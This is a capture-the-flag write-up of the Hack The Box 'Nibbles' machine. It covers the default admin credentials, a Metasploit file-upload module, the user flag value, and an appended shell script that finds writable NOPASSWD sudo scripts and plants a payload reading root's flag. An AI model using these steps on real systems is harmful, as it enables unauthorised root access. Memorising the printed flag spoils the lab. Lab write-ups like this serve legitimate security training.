Writeup: Hack The Box - Machines - Nibbles

Description

  • Name: Nibbles
  • IP: 10.10.10.75
  • Author: mrb3n
  • Difficulty: Easy

Discovery

nmap -sV -sC -Pn 10.10.10.75 -p 1-65535 -T5

Nmap scan report for 10.10.10.75
Host is up (0.032s latency).
Not shown: 65075 closed ports, 458 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Pwn

The HTML source of the web server's index page contains an HTML comment pointing at the application: <!-- /nibbleblog/ directory. Nothing interesting here! -->

Poking around in /nibbleblog/ we found the admin login page http://10.10.10.75/nibbleblog/admin.php, and the application, Nibbleblog, has a known authenticated file upload exploit, so valid admin credentials are the only thing missing.

Trying a few default and obvious credential combinations, one worked: admin:nibbles (the password is simply the machine name).

With those credentials and the Metasploit module exploit/multi/http/nibbleblog_file_upload we got a session on the box.

The user flag is in /home/nibbler/user.txt: b02ff32bb332deba49eeaed21152c8d8.

The system flag is in /root/root.txt, but before we could read it someone requested a reset of the machine, so the session was lost, and someone else then changed the default credentials, so the web application could not be re-exploited the same way.

Running LinEnum to enumerate local privilege escalation vectors, its sudo check (sudo -l) showed that nibbler can run /home/nibbler/personal/stuff/monitor.sh as root without a password. The path is inside nibbler's own home directory, so the user fully controls what that script contains.

So we created monitor.sh at that path with the payload cat /root/root.txt > /tmp/asd (echo "cat /root/root.txt > /tmp/asd" > monitor.sh), made it executable with chmod +x, and ran it with sudo; /tmp/asd then contained the root flag. Any writable (or missing, in a writable directory) script that sudo allows without a password is an equivalent root shell, so this is the first thing to check whenever sudo -l lists a NOPASSWD entry.
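The following is an added example, not code from the original writeup: a small POSIX sh audit that reads sudo -l output, lists the NOPASSWD commands, and flags those the current user can replace (writable file, or missing file in a writable directory), plus a helper that plants the writeup's payload. It assumes the standard sudo -l entry format "(user) NOPASSWD: /path/cmd, /path/other"; the SAMPLE text is constructed to mirror the Nibbles entry and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit `sudo -l` output for
# NOPASSWD commands the current user can hijack, and plant the writeup's payload.

# Print the command paths from NOPASSWD entries in sudo -l output read on stdin.
# "(root) NOPASSWD: /bin/a, /bin/b arg" yields /bin/a and /bin/b; an "ALL"
# entry is skipped because it is not a path (and needs no hijack at all).
nopasswd_targets() {
    sed -n 's/.*NOPASSWD:[[:space:]]*//p' \
        | tr ',' '\n' \
        | sed 's/^[[:space:]]*//; s/[[:space:]].*$//' \
        | grep '^/'
}

# Succeed if the script at $1 can be replaced by the current user: either the
# file itself is writable, or it is missing and its parent directory is
# writable (a script under the user's own home, as on Nibbles).
hijackable() {
    if [ -e "$1" ]; then
        [ -w "$1" ]
    else
        [ -w "$(dirname "$1")" ]
    fi
}

# Run the audit over sudo -l output on stdin, one report line per command.
audit_sudo() {
    nopasswd_targets | while IFS= read -r cmd; do
        if hijackable "$cmd"; then
            printf 'HIJACKABLE %s\n' "$cmd"
        else
            printf 'ok         %s\n' "$cmd"
        fi
    done
}

# Write the writeup's payload into the target script and make it executable.
# The shebang makes sure the file runs under sh regardless of how sudo starts it.
plant_script() {
    printf '#!/bin/sh\ncat /root/root.txt > /tmp/asd\n' > "$1"
    chmod +x "$1"
}

# Constructed sample standing in for `sudo -l` as seen on Nibbles (assumption).
SAMPLE='User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

printf '%s\n' "$SAMPLE" | audit_sudo
# On the target itself:  sudo -l | audit_sudo
# then:  plant_script /home/nibbler/personal/stuff/monitor.sh
#        sudo /home/nibbler/personal/stuff/monitor.sh && cat /tmp/asd
```

Run offline, the sample prints "ok" because /home/nibbler does not exist on your machine; on the box the same entry is reported as HIJACKABLE, and after plant_script the sudo call drops the flag into /tmp/asd.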